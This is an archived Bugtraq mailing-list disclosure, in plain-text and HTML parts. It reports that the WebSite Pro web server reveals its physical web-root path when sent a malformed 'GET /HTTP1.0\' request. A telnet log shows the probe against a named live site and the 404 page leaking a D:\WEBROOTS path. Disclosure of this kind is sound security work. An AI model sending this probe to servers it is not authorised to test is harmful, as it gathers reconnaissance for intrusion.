This is a multi-part message in MIME format.
------=_NextPart_000_005B_01BF5D34.2C3C5FE0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Dear Bugtraqers,
Description:
WebSite Pro is also revealing the webdirectory of each Website by a =
simple command line.
This bug is similar to the "IIS revealing webdirectories" bug reported =
on bugtraq.
On WebSitePro the diference ist the way you retrieve the path.
Example:
(Made with MS Windows Telnet Client)
Logfile:
-----------------------------------------------------------------------st=
art-------------------------------------------------------------------
GET /HTTP1.0\ <------ Our command we send via Telnet on port 80 to =
the webserver
Response:
Content-length: 186
=20
<HTML><HEAD><TITLE>Document Moved</TITLE></HEAD>
<BODY =
bgcolor=3D"White"><H2>Docume
nt Moved</H2>
This document has moved <A =
HREF=3D"http://www.akte.net/HTTP1.0/">here
</A>.<P>
</BODY></HTML>
GET /HTTP1.0/
Content-length: 230
=20
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY =
bgcolor=3D"White"><H2>404 Not
Found</H2>
The requested URL was not found on this =
server:<P><CODE>/HTTP1.0/<P>(
D:\WEBROOTS\VHOSTS\aktenet\htdocs\HTTP1.0)</CODE><P>
</BODY></HTML>
-------------------------------------------------------------------end---=
----------------------------------------------------------------
Here it shows us, that the HTML files are in =
D:\WEBROOTS\VHOSTS\aktenet\htdocs.
It's not a large threat but an attacker might gain information about =
the server which should stay
in Admin's hands. On all Webservers e.g. MS IIS and Apache the response =
is "error 404".
-------cut------
Elias: I have some html in this mail, try to send it as clear text, as =
it is, please.
Else people with html capable browsers will only get half of the =
logfile.
Thx :-)
------cut------
-------------------------------
Lark Lizerman
lizermanat_private
-------------------------------
------=_NextPart_000_005B_01BF5D34.2C3C5FE0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2722.2800" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#fffff0>
<DIV><FONT face=3DArial size=3D2>Dear Bugtraqers,</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Description:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>WebSite Pro is also revealing the =
webdirectory of=20
each Website by a simple command line.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>This bug is similar to the "IIS =
revealing=20
webdirectories" bug reported on bugtraq.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>On WebSitePro the diference ist the way =
you=20
retrieve the path.</FONT></DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Example:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>(Made with MS Windows Telnet =
Client)</FONT></DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Logfile:</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial=20
size=3D2>----------------------------------------------------------------=
-------start-------------------------------------------------------------=
------</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>GET /HTTP1.0\ =
<------ Our=20
command we send via Telnet on port 80 to the webserver<BR></FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>Response:</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>Content-length:=20
186<BR> <BR><HTML><HEAD><TITLE>Document=20
Moved</TITLE></HEAD><BR> &=
nbsp; &n=
bsp; &nb=
sp; &nbs=
p; =20
<BODY bgcolor=3D"White"><H2>Docume<BR>nt=20
Moved</H2><BR>  =
; =20
This document has moved <A=20
HREF=3D"http://www.akte.net/HTTP1.0/">here<BR></A>.<P><BR>=
=20
</BODY></HTML><BR>GET /HTTP1.0/<BR>Content-length:=20
230<BR> <BR><HTML><HEAD><TITLE>404 Not=20
Found</TITLE></HEAD><BR> &=
nbsp; &n=
bsp; &nb=
sp; &nbs=
p; =20
<BODY bgcolor=3D"White"><H2>404=20
Not<BR> Found</H2><BR> &nbs=
p; =20
The requested URL was not found on this=20
server:<P><CODE>/HTTP1.0/<P>(<BR>D:\WEBROOTS\VHOSTS\akt=
enet\htdocs\HTTP1.0)</CODE><P><BR> &nb=
sp; &nbs=
p;  =
; =
=20
</BODY></HTML></FONT></DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial=20
size=3D2>----------------------------------------------------------------=
---end-------------------------------------------------------------------=
</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>Here it shows us, that the HTML files =
are in=20
D:\WEBROOTS\VHOSTS\aktenet\htdocs.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>It's not a large threat but an attacker =
might =20
gain information about the server which should stay</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>in Admin's hands. =
On all Webservers e.g.=20
MS IIS and Apache the response is "error 404".</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>-------cut------</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>Elias: I have some html in this mail, =
try to send=20
it as clear text, as it is, please.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>Else people with html capable browsers =
will only=20
get half of the logfile.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>Thx :-)</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>------cut------</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>-------------------------------<BR>Lark =
Lizerman<BR><BR><A=20
href=3D"mailto:lizermanat_private">lizermanat_private</A><BR>----------=
---------------------</FONT></DIV></BODY></HTML>
------=_NextPart_000_005B_01BF5D34.2C3C5FE0--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:27:54 PDT